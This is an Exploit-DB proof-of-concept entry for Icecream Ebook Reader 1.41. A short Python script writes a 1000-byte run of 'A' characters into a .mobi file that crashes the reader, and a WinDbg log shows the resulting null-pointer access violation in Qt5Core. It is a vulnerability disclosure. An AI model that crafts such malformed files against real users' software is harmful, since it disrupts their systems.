IceCream Ebook Reader 1.41 – Crash (PoC)

  • 作者: Kapil Soni
    日期: 2015-01-23
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/35889/
  • # Exploit Title: [Icecream Ebook Reader v1.41 (.mobi/.prc) Denial of Service]
# Date: [23/01/2015]
# Exploit Author: [Kapil Soni]
# Twitter: [@Haxinos]
# Vendor Homepage: [http://icecreamapps.com/]
# Version: [Icecream Ebook Reader v1.41]
# Tested on: [Windows XP SP2]

#Technical Details & Description:
#================================
#A Memory Corruption Vulnerability is detected on Icecream Ebook Reader v1.41. An attacker can crash the software by using .mobi and .prc file.
#Attackers can crash the software local by user inter action over .mobi and .prc (ebooks).


#Piece of Code
#========================================================================

#!/usr/bin/python

buffer = "A"*1000

filename = "crash"+".mobi" # For testing with .prc, change the extension
file = open(filename, 'w')
file.write(buffer)
file.close()

print "File Successfully Created [1]"

#========================================================================
#Debugging and Error Log
#========================

#Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
#Copyright (c) Microsoft Corporation. All rights reserved.
#*** wait with pending attach
#Symbol search path is: *** Invalid ***
#****************************************************************************
#* Symbol loading may be unreliable without a symbol search path. *
#* Use .symfix to have the debugger choose a symbol path. *
#* After setting your symbol path, use .reload to refresh symbol locations. *
#****************************************************************************
#Executable search path is: 
#ModLoad: 00400000 00bd2000 C:\Program Files\Icecream Ebook Reader\ebookreader.exe
#ModLoad: 7c900000 7c9b0000 C:\WINDOWS\system32\ntdll.dll
#ModLoad: 7c800000 7c8f4000 C:\WINDOWS\system32\kernel32.dll
#ModLoad: 67000000 673f1000 C:\Program Files\Icecream Ebook Reader\Qt5Core.dll
#ModLoad: 00d30000 01158000 C:\Program Files\Icecream Ebook Reader\Qt5Gui.dll
#.... Snipped
#ModLoad: 769c0000 76a73000 C:\WINDOWS\system32\userenv.dll
#ModLoad: 01960000 0196c000 C:\Program Files\Icecream Ebook Reader\imageformats\qdds.dll
#ModLoad: 01970000 01979000 C:\Program Files\Icecream Ebook Reader\imageformats\qgif.dll
#ModLoad: 01b10000 01b18000 C:\Program Files\Icecream Ebook Reader\imageformats\qwbmp.dll
#ModLoad: 01b20000 01b66000 C:\Program Files\Icecream Ebook Reader\imageformats\qwebp.dll
#ModLoad: 09e70000 09f0f000 C:\Program Files\Icecream Ebook Reader\sqldrivers\qsqlite.dll
#ModLoad: 20000000 202c5000 C:\WINDOWS\system32\xpsp2res.dll
#(f9c.e34): Break instruction exception - code 80000003 (first chance)
#eax=7ffd7000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
#eip=7c901230 esp=0a67ffcc ebp=0a67fff4 iopl=0 nv up ei pl zr na pe nc
#cs=001bss=0023ds=0023es=0023fs=0038gs=0000 efl=00000246
#*** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll - 
#ntdll!DbgBreakPoint:
#7c901230 ccint 3
#0:003> g
#ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\Comdlg32.dll
#ModLoad: 77b40000 77b62000 C:\WINDOWS\system32\appHelp.dll
#ModLoad: 76fd0000 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL
#ModLoad: 77050000 77115000 C:\WINDOWS\system32\COMRes.dll
#... Snipped
#ModLoad: 771b0000 77256000 C:\WINDOWS\system32\WININET.dll
#ModLoad: 76f60000 76f8c000 C:\WINDOWS\system32\WLDAP32.dll
#ModLoad: 74e30000 74e9c000 C:\WINDOWS\system32\RichEd20.dll
#ModLoad: 76980000 76988000 C:\WINDOWS\system32\LINKINFO.dll
#QIODevice::read: Called with maxSize < 0
#QIODevice::read: Called with maxSize < 0

#(f9c.998): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=6723d888 ebx=00000000 ecx=00000000 edx=ffffffff esi=0012cd9c edi=0012cf38
#eip=671da2a7 esp=0012cc30 ebp=0012cc90 iopl=0 nv up ei pl nz na pe cy
#cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010207
#*** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Program Files\Icecream Ebook Reader\Qt5Core.dll - 
#Qt5Core!QTextCodec::toUnicode+0x7:
#671da2a7 8b11mov edx,dword ptr [ecx]ds:0023:00000000=????????

#Exploitation Technique:
#============================
#Local, DoS, Memory Corruption

#Solution - Fix & Patch:
#=======================
#Restrict working maximum size & set a own exception-handling for over-sized requests.

#Author:
#=======
#Kapil Soni (Haxinos)